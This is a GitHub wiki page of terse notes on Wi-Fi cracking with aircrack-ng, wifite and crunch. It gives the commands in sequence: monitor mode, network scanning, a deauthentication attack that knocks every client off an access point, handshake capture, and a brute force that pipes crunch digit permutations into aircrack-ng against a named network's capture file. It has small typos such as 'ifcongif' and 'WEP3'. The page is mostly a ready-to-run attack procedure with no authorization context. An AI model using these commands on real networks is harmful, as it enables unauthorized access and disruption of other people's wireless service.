Aircrack‐ng and Crunch - MDimitroff/kali GitHub Wiki

Turn the wireless card into monitor mode
ifcongif wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

Check the status
airmon-ng check wlan0
As a result of this command, if there are processes shown that can interfere and cause issues, you need to kill them by using their process ID. TODO: check if this is really necessary?

Check the wireless networks around
airodump-ng wlan0

Perform monitoring on a specific wireless network
airodump-ng -c <channel#> -w <OutputFilename> --bssid <MACAddress> wlan0

Deauthenticate all host from a particular wireless access point (AP)
aireplay-ng -0 0 -a <MACAddress> wlan0

https://superuser.com/questions/1376156/aircrack-ng-cant-read-file-or-crunchs-standard-output-fedora
$ airodump-ng
$ airodump-ng -c --bssid mac:address -w
$ crunch | aircrack-ng -w <file.cap> - --bssid mac:address

wifite, crunch and aircrack-ng

Capture the handshake of wifi connection with WEP3 encryption
wifite --kill

The output of the program will generate a folder with name ./hs Inside this folder there is a file with extention handshake-{SSID}-{MAC}.cap Use this file to generate the brute force attack against it.

Generate using Crunch all possible permutations with leght of 10 characters, by using all digits from 0-9 and pass the output to Aircrack-NG to try it to decrypt the package.
crunch 10 10 -t %%%%%%%%%% 0123456789 | aircrack-ng -w - ./hs/handshake_AltonaSoft24GHz_B8-69-F4-84-53-BA_2023-11-05T16-47-39.cap --bssid B8:69:F4:84:53:BA

⚠️ **GitHub.com Fallback** ⚠️